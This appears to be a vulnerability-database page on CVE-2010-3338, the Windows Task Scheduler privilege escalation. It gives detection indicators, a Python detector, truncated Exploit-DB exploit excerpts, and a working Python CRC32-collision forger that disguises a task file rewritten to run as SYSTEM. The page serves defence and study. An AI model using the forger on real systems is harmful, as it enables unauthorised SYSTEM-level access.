CVE-2010-3338
Published: 2010-12-16
Priority: P2
CVSS 2.0: 7.2 (high), vector AV:L/AC:L/Au:N/C:C/I:C/A:C
Tags: ITW · Exploit · VulnCheck KEV
Exploited in the wild
EPSS: 19.86% (97.1st percentile)
The Windows Task Scheduler in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly determine the security context of scheduled tasks, which allows local users to gain privileges via a crafted application, aka "Task Scheduler Vulnerability." NOTE: this might overlap CVE-2010-3888.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_server_2008 | — | — |
Detection & IOCs (extracted from sources)
Detections:
- Monitor for task XML files written to %SystemRoot%\system32\tasks\ by non-SYSTEM processes, especially with UserId changed to S-1-5-18 (the SYSTEM SID) or Author set to 'LocalSystem'.
- Detect task XML manipulation that replaces 'LeastPrivilege' with 'HighestAvailable' and SID values with S-1-5-18 in task files under system32\tasks\.
- Alert on a rapid schtasks.exe sequence against the same task name: /create, then /change /disable, /change /enable and /run. This disable/enable cycle is the exploit trigger.
- Detect task XML files that begin with a UTF-16 LE BOM (bytes FF FE) and are written directly to the tasks folder by user-level processes; the exploit rewrites the task file with a forged CRC32 and a Unicode BOM.
- Flag creation of a batch file (xpl.bat) in %TEMP% that adds a local user and adds that user to the Administrators group; the VBScript exploit variant drops it as the payload.
- Detect use of the Metasploit module ms10_092_schelevator from a meterpreter session: a randomly named .exe is written to %TEMP% and registered as a scheduled task.
- Monitor for the 'Actions Context' attribute changed from 'Author' to 'LocalSystem' and the 'Principal id' attribute changed from 'Author' to 'LocalSystem' in task XML files.
Caveats:
- The exploit only works against Windows Vista, Windows 7 and Windows Server 2008 (including R2); other Windows versions are not affected.
- The Metasploit module does not support WOW64 (32-bit meterpreter on a 64-bit OS) because filesystem redirection prevents direct access to the task file; an x64 meterpreter session is required.
- The vulnerability requires the attacker to already have a local session (local privilege escalation only); remote exploitation is not possible.
- The exploit relies on the Task Scheduler validating task files with nothing more than a CRC32 checksum, so the forged task file must produce a CRC32 collision with the original to succeed.
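The detections listed above, as an added example in Python (not code from the page's sources) run over constructed samples: a task XML as the service writes it for a normal user, the same file after it has been rewritten to run as SYSTEM, and a constructed schtasks.exe command-line history. The SIDs, user names, task names and paths are hypothetical; in production the file bytes would come from file-write telemetry on %SystemRoot%\system32\tasks\ and the command lines from process-creation events.

```python
"""Checks for the task-file IOCs listed above, over constructed samples.

Added example, not code from the page's sources. Task XML, SIDs, user
names and command lines are made up.
"""
import re
import xml.etree.ElementTree as ET

SYSTEM_SID = "S-1-5-18"
UTF16LE_BOM = b"\xff\xfe"
TASK_NS = "http://schemas.microsoft.com/windows/2004/02/mit/task"


def _task_xml(author, principal_id, user_sid, run_level, context):
    """Minimal Task Scheduler 2.0 XML body (constructed sample)."""
    return (
        '<?xml version="1.0" encoding="UTF-16"?>'
        f'<Task version="1.2" xmlns="{TASK_NS}">'
        f'<RegistrationInfo><Author>{author}</Author></RegistrationInfo>'
        f'<Principals><Principal id="{principal_id}"><UserId>{user_sid}</UserId>'
        f'<LogonType>InteractiveToken</LogonType><RunLevel>{run_level}</RunLevel>'
        '</Principal></Principals>'
        f'<Actions Context="{context}"><Exec><Command>cmd.exe</Command></Exec></Actions>'
        '</Task>'
    )


# Written by the service after a normal user ran schtasks /create.
BENIGN_TASK = UTF16LE_BOM + _task_xml(
    "LAB\\alice", "Author", "S-1-5-21-1-2-3-1001", "LeastPrivilege", "Author"
).encode("utf-16-le")
# The same file after it was rewritten to run as SYSTEM.
TAMPERED_TASK = UTF16LE_BOM + _task_xml(
    "LocalSystem", "LocalSystem", SYSTEM_SID, "HighestAvailable", "LocalSystem"
).encode("utf-16-le")


def inspect_task_xml(raw, writer_is_system):
    """Return the names of the IOCs above that match one task file.

    raw: file bytes. writer_is_system: whether the process that wrote the
    file ran as SYSTEM (the Task Scheduler service) rather than as a user.
    """
    hits = []
    if raw.startswith(UTF16LE_BOM):
        text = raw[len(UTF16LE_BOM):].decode("utf-16-le")
        if not writer_is_system:
            hits.append("utf16-bom-file-written-by-user-process")
    else:
        text = raw.decode("utf-8", errors="replace")
    # ElementTree takes an already-decoded str, so drop the XML declaration.
    root = ET.fromstring(re.sub(r"^<\?xml[^>]*\?>", "", text))
    ns = {"t": TASK_NS}
    if root.findtext("t:RegistrationInfo/t:Author", default="", namespaces=ns) == "LocalSystem":
        hits.append("author-localsystem")
    principal = root.find("t:Principals/t:Principal", ns)
    if principal is not None:
        if principal.get("id") == "LocalSystem":
            hits.append("principal-id-localsystem")
        if principal.findtext("t:UserId", default="", namespaces=ns) == SYSTEM_SID:
            hits.append("userid-is-system-sid")
        if principal.findtext("t:RunLevel", default="", namespaces=ns) == "HighestAvailable":
            hits.append("runlevel-highestavailable")
    actions = root.find("t:Actions", ns)
    if actions is not None and actions.get("Context") == "LocalSystem":
        hits.append("actions-context-localsystem")
    return hits


# Constructed process-creation history for one user session.
PROCESS_LOG = [
    r'schtasks.exe /create /tn xpl /tr "%TEMP%\xpl.bat" /sc once /st 23:59',
    r'schtasks.exe /change /tn xpl /disable',
    r'schtasks.exe /change /tn xpl /enable',
    r'schtasks.exe /run /tn xpl',
    r'schtasks.exe /create /tn backup /tr C:\tools\backup.exe /sc daily /st 02:00',
    r'schtasks.exe /run /tn backup',
]
_TN = re.compile(r'/tn\s+"?([^"\s]+)"?')
# Stages of the trigger sequence; each must follow the previous one for the same /tn.
STAGES = (("/create",), ("/change", "/disable"), ("/change", "/enable"), ("/run",))


def find_disable_enable_cycle(cmdlines):
    """Return task names that went through the full create/disable/enable/run cycle."""
    progress, flagged = {}, []
    for cmd in cmdlines:
        low = cmd.lower()
        match = _TN.search(low)
        if "schtasks" not in low or not match:
            continue
        name, toks = match.group(1), set(low.split())
        for stage, required in enumerate(STAGES):
            if all(t in toks for t in required):
                if progress.get(name, -1) == stage - 1:
                    progress[name] = stage
                break
        if progress.get(name) == len(STAGES) - 1 and name not in flagged:
            flagged.append(name)
    return flagged
```

The benign task yields no hits; the tampered one trips the BOM-from-user-process check plus every XML indicator, and only the task that completed the whole create/disable/enable/run sequence is reported, so an ordinary create-then-run does not page anyone.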
CVSS provenance
- NVD: CVSS v2.0 7.2 HIGH (AV:L/AC:L/Au:N/C:C/I:C/A:C)
- VulnCheck: 7.2 HIGH
GHSA
GHSA-mpmp-qx9g-mvg3 (ghsa_unreviewed · 2022-05-14 · CVSS 7.2 · HIGH · CWE-20)
Description: identical to the CVE description above.
VulnCheck
Microsoft Windows Improper Input Validation (vulncheck · 2010 · CVSS 7.2 · HIGH)
Description: identical to the CVE description above.
Affected: Microsoft Windows
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References:
- https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf
- https://go.group-ib.com/hubfs/report/protected/group-ib-opera1er-full-threat-research-2022-en.pdf
Exploit PoC: http
No detection rules found.
Exploit-DB
Microsoft Windows - Task Scheduler '.XML' Local Privilege Escalation (MS10-092) (Metasploit)
exploitdb · 2012-07-19 · CVE-2010-3888
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'msf/core/post/common'
require 'rex'
require 'zlib'
class Metasploit3 < Msf::Exploit::Local
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Windows Escalate Task Scheduler XML Privilege Escalation',
      'Description' => %q{
        This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet.
        When processing task files, the Windows Task Scheduler only uses a CRC32
        checksum to validate that the file has not been tampered with. Also, In a default
        configuration, normal users can read and write the tas
Exploit-DB
Microsoft Windows - Task Scheduler Privilege Escalation
exploitdb · 2010-11-20 · CVE-2010-3888
---
# Exploit Title: Windows Task Scheduler Privilege Escalation 0day
# Date: 20-11-2010
# Author: webDEViL
# Tested on: Windows 7/2008 x86/x64
crc_table = new Array(
0x00000000, 0x77073096, 0xEE0E612C, 0x990951BA, 0x076DC419,
0x706AF48F, 0xE963A535, 0x9E6495A3, 0x0EDB8832, 0x79DCB8A4,
0xE0D5E91E, 0x97D2D988, 0x09B64C2B, 0x7EB17CBD, 0xE7B82D07,
0x90BF1D91, 0x1DB71064, 0x6AB020F2, 0xF3B97148, 0x84BE41DE,
0x1ADAD47D, 0x6DDDE4EB, 0xF4D4B551, 0x83D385C7, 0x136C9856,
0x646BA8C0, 0xFD62F97A, 0x8A65C9EC, 0x14015C4F, 0x63066CD9,
0xFA0F3D63, 0x8D080DF5, 0x3B6E20C8, 0x4C69105E, 0xD56041E4,
0xA2677172, 0x3C03E4D1, 0x4B04D447, 0xD20D85FD, 0xA50AB56B,
0x35B5A8FA, 0x42B2986C, 0xDBBBC9D6, 0xACBCF940, 0x32D86CE3,
0x45DF5C75, 0xDCD60DCF, 0xABD13D5
Exploit-DB
CA Advantage Ingres 2.6 - Multiple Buffer Overflow Vulnerabilities (PoC)
exploitdb · 2010-08-14 · CVE-2007-3336 · CVSS 10.0 · CRITICAL
Note: this entry covers CVE-2007-3336 through CVE-2007-3338 in CA Advantage Ingres and is unrelated to the Task Scheduler vulnerability.
---
# Exploit Title: Computer Associates Advantage Ingres 2.6 Multiple Buffer Overflow Vulnerabilities PoC
# Date: 2010-08-14
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Version: 2.6
# Tested on: Windows 2003 Server SP1 en
# CVE: CVE-2007-3336 - CVE-2007-3338
# Notes: Fixed in the last version.
# iigcc - EDX holds a pointer that's overwritten at byte 2106 and it crashes while executing
# MOV EAX,DWORD PTR DS:[EDX+8]
# iijdbc - EDI holds a pointer that's overwritten at byte 1066 and it crashes while executing
# CMP ECX,DWORD PTR DS:[EDI+4]
# please let me know if you are/were able to get code execution
import socket
import sys
if len(sys.argv) != 4:
print "Usage: ./CAAdvantageDoS.py "
print "Vulnerable Serv
Metasploit
Windows Escalate Task Scheduler XML Privilege Escalation (metasploit)
This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet. When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with. Also, in a default configuration, normal users can read and write the task files that they have created. By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges. NOTE: Thanks to webDEViL for the information about disable/enable.
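The CRC32 collision that the Metasploit description and the caveat in the Detection & IOCs section both rest on, as an added example in Python (not the Metasploit module's or webDEViL's code): a constructed UTF-16 LE task file is edited to run as SYSTEM, then four bytes inside a trailing XML comment are solved so that the modified file's CRC32 equals the original's. Because CRC32 is linear, the four bytes can be computed directly rather than searched for; the only loop is over harmless filler text until the solved bytes happen to be legal comment characters. The task bodies, SIDs and paths are constructed; nothing here touches a real tasks folder.

```python
"""Forge a CRC32 collision for a modified Task Scheduler XML file.

Added example, not the Metasploit module or webDEViL's exploit. The task
bodies are constructed samples.
"""
import zlib

POLY = 0xEDB88320                      # reflected CRC-32 polynomial used by zlib
TABLE = []
for i in range(256):
    c = i
    for _ in range(8):
        c = (c >> 1) ^ POLY if c & 1 else c >> 1
    TABLE.append(c)
# The top byte of every table entry is distinct, so the top byte of the
# register after a step pins down which table entry that step used. That is
# what lets the four-byte patch below be solved one byte at a time.
TOP_TO_INDEX = {t >> 24: i for i, t in enumerate(TABLE)}
assert len(TOP_TO_INDEX) == 256


def crc32_of(data):
    return zlib.crc32(data) & 0xFFFFFFFF


def _unroll(reg_after, tail):
    """Undo the CRC update of `tail`: the register that, fed `tail`, gives reg_after."""
    s = reg_after
    for b in reversed(tail):
        idx = TOP_TO_INDEX[s >> 24]
        s = (((s ^ TABLE[idx]) << 8) & 0xFFFFFFFF) | (idx ^ b)
    return s


def crc32_patch(prefix, target, suffix=b""):
    """Return 4 bytes p with crc32_of(prefix + p + suffix) == target."""
    reg = crc32_of(prefix) ^ 0xFFFFFFFF            # register after prefix
    want = _unroll(target ^ 0xFFFFFFFF, suffix)     # register needed before suffix
    # Backwards from `want`: each step's table index is fixed by the top byte.
    idxs, s = [], want
    for _ in range(4):
        idx = TOP_TO_INDEX[s >> 24]
        idxs.append(idx)
        s = ((s ^ TABLE[idx]) << 8) & 0xFFFFFFFF
    # Forwards from the real register: pick each byte so it selects that index.
    patch, s = bytearray(), reg
    for idx in reversed(idxs):
        patch.append((s & 0xFF) ^ idx)
        s = (s >> 8) ^ TABLE[idx]
    assert s == want
    return bytes(patch)


def _task(user_sid, run_level):
    """Constructed UTF-16LE task file with BOM, as the exploit rewrites it."""
    xml = ('<?xml version="1.0" encoding="UTF-16"?>'
           '<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
           f'<Principals><Principal id="Author"><UserId>{user_sid}</UserId>'
           f'<RunLevel>{run_level}</RunLevel></Principal></Principals>'
           '<Actions Context="Author"><Exec><Command>cmd.exe</Command></Exec></Actions></Task>')
    return b"\xff\xfe" + xml.encode("utf-16-le")


ORIGINAL_TASK = _task("S-1-5-21-1-2-3-1001", "LeastPrivilege")   # what the service wrote
MODIFIED_TASK = _task("S-1-5-18", "HighestAvailable")              # what the attacker wants


def _comment_safe(chunk):
    """True if the 4 patch bytes are two UTF-16LE units legal inside an XML comment."""
    try:
        text = chunk.decode("utf-16-le")
    except UnicodeDecodeError:                 # lone surrogate halves
        return False
    if "--" in text or "\ufffe" in text or "\uffff" in text:
        return False
    return all(ch in "\t\n\r" or ord(ch) >= 0x20 for ch in text)


def forge_task_file(original, modified):
    """Append a comment to `modified` so the file's CRC32 equals `original`'s."""
    target = crc32_of(original)
    suffix = " -->".encode("utf-16-le")
    for n in range(100000):
        # Vary filler text until the solved bytes happen to be legal comment text.
        prefix = modified + f"<!-- pad{n} ".encode("utf-16-le")
        patch = crc32_patch(prefix, target, suffix)
        if _comment_safe(patch):
            return prefix + patch + suffix
    raise RuntimeError("no comment-safe patch found")
```

The forged file still parses as a task (a comment after the root element is legal XML), carries the SYSTEM SID and HighestAvailable, and has the original's CRC32, which is all the vulnerable check compared. The same solver, with the CRC replaced by a keyed or collision-resistant hash over the file, would have nothing to attack; that is the fix MS10-092 shipped.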
References:
- http://www.securitytracker.com/id?1024874
- http://www.us-cert.gov/cas/techalerts/TA10-348A.html
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-092
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12304